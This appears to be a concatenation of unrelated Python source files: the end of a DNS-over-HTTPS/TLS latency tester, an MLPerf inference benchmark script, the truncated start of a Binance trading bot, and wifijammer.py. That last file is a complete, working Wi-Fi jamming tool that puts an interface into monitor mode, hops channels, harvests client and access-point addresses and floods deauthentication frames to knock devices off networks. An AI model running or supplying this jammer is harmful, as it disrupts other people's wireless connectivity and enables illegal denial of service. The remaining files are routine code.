norm_google_dns = ",".join(norm_google_dns)
except:
traceback.print_exc()
norm_google_dns = False
sleep(random.uniform(0.5,1.5))
if sec_dns != False:
sec_latency = ping(sec_dns)
else: sec_latency = False
if norm_dns != False:
norm_latency = ping(norm_dns)
else: norm_latency = False
#traceroute
result[host] = {
'sec_resolver' : sec,
'sec_dns' : sec_dns,
'norm_dns' : norm_dns,
'norm_google_dns' : norm_google_dns,
'sec_latency' : sec_latency,
'norm_latency' : norm_latency
}
sleep(random.uniform(1,3))
insert(result, "test")
sleep(random.uniform(40,60))
def main():
"""print(ping("8.8.8.8"))
print(doh("google.com", 'cloudflare'))
print(doh("google.com", 'google'))
print(doh("google.com", 'quad9'))
print(dot("google.com", 'cloudflare'))
print(dot("google.com", 'google'))
print(dot("google.com", 'quad9'))
print(normal_dns("google.com", 'cloudflare', 'udp'))
print(normal_dns("google.com", 'google', 'udp'))
print(normal_dns("google.com", 'quad9', 'udp'))
print(normal_dns("google.com", 'system', 'udp'))
print(normal_dns("google.com", 'cloudflare', 'tcp'))
print(normal_dns("google.com", 'google', 'tcp'))
print(normal_dns("google.com", 'quad9', 'tcp'))"""
hosts = [
"google.com",
"instagram.com",
"digikala.com",
"twitch.tv",
"aparat.ir",
"wikipedia.com",
"whatsapp.com"
]
db.connect()
db.create_tables([secdns_test, test, sensor])
reg = threading.Thread(target=register, args=())
reg.start()
rep = threading.Thread(target=report, args=())
rep.start()
x = threading.Thread(target=get_secdns_stat, args=())
x.start()
sleep(90)
print("Startng main test thread")
y = threading.Thread(target=host_test, args=(hosts,))
y.start()
if __name__ == '__main__':
main()
|
wifijammer.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s",
"--skip",
nargs='*',
default=[],
help="Skip deauthing this MAC address. \
Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i",
"--interface",
help="Choose monitor mode interface. \
By default script will find the most powerful \
interface and starts monitor mode on it. \
Example: -i mon5")
parser.add_argument("-c",
"--channel",
help="Listen on and deauth only clients on the specified channel. \
Example: -c 6")
parser.add_argument("-m",
"--maximum",
help="Choose the maximum number of clients to deauth. \
List of clients will be emptied and repopulated \
after hitting the limit. Example: -m 5")
parser.add_argument("-n",
"--noupdate",
help="Do not clear the deauth list when the maximum (-m) \
number of client/AP combos is reached. \
Must be used in conjunction with -m. \
Example: -m 10 -n",
action='store_true')
parser.add_argument("-t",
"--timeinterval",
help="Choose the time interval between packets being sent. \
Default is as fast as possible. \
If you see scapy errors like 'no buffer space' \
try: -t .00001")
parser.add_argument("-p",
"--packets",
help="Choose the number of packets to send in each deauth burst. \
Default value is 1; \
1 packet to the client and 1 packet to the AP. \
Send 2 deauth packets to the client \
and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d",
"--directedonly",
help="Skip the deauthentication packets to the broadcast \
address of the access points and only send them \
to client/AP pairs",
action='store_true')
parser.add_argument("-a",
"--accesspoint",
help="Enter the MAC address of a specific access point to target")
parser.add_argument("--world",
help="N. American standard is 11 channels but the rest \
of the world it's 13 so this options enables the \
scanning of 13 channels",
action="store_true")
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore += [addr.lower() for addr in skip]
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint.lower() not in [pkt.addr1, pkt.addr2]:
return
if args.skip:
if pkt.addr2 in args.skip:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
#if noise_filter(skip, pkt.addr1, pkt.addr2):
# return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
args.skip = list(map(str.lower, args.skip))
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3],"use_label_map": False}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# mobilenet2
"mobilenet2-tf": {
"inputs": "input:0",
"outputs": "MobilenetV2/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet2",
},
"mobilenet2-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV2/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet2",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--samples-per-query", type=int, help="mlperf multi-stream sample per query")
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
if count:
count_override = True
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if count_override:
settings.min_query_count = count
settings.max_query_count = count
if args.samples_per_query:
settings.multi_stream_samples_per_query = args.samples_per_query
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 500), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
__main__.py
|
import sys
import websocket
import threading
import time
from binance import Client
from wenmoon.Config import Config
from wenmoon.Bot import Bot
from wenmoon.strategies.macd_rsi_strategy import Strategy
# Get configurations
config = Config()
# Log into the binance client API using the supplied api key and secret
binance_client = Client(
config.api_key,
config.secret_key
)
# Get symbol info
symbol_info = binance_client.get_symbol_info(config.watch_symbol_pair)
# Get the strategy to be used
# strategy = get_strategy(config.strategy)
strategy = Strategy(symbol_info)
# strategy.scout("1", "2")
# print(strategy)
# Initialise bot
bot = Bot(config, strategy, binance_client)
# Set up the url for the required websocket stream (URL is case-sensitive)
socket = f"wss://stream.binance.com:9443/ws/{config.watch_symbol_pair.lower()}@kline_{config.interval}"
# Disable full websocket logging
websocket.enableTrace(False)
def on_message(ws, message):
"""Called when the websocket receives a message.
This function passes the message on to the Bot instance to handle.
Args:
ws: Websocket instance
message (str): The decoded message received from the websocket
"""
bot.handle_websocket_message(message)
def on_close(ws, close_status_code, close_msg):
"""Called when the websocket closes.
This could be due to an error or keyboard interrupt.
When the websocket connection closes, we attempt to reconnect to it here, and keep trying every 10 seconds.
Args:
ws: Websocket instnace
close_status_code (str):
close_msg (str):
"""
print("Websocket closed")
print(f"Closing with status code {close_status_code}")
print("Retry : %s" % time.ctime())
# Retry websocket reconnect every 10s
time.sleep(10)
connect_websocket()
def on_error(ws, error):
"""Called when the websocket encounters an error.
This function simply logs the error.
After an error, the websocket is automatically closed, and the on_close function is called.
Args:
ws: Websocket instnace
error (str): Error message
"""
print(f"ERROR: {error}")
def on_open(ws):
"""Called when the websocket is opened.
This function calls the bot.start function which handles initialisation of candle data and strategy.
Args:
ws: Websocket instance
"""
print("Starting bot")
bot.start()
def connect_websocket():
"""Handles connection to the websocket.
The socket url is defined outside this scope from the configuration file.
This function initialises the websocket and specifies the callback functions for opening and closeing the websocket,
along with message and error handling.
The websocket is run on a thread.
"""
print(f"Watching prices on {socket}")
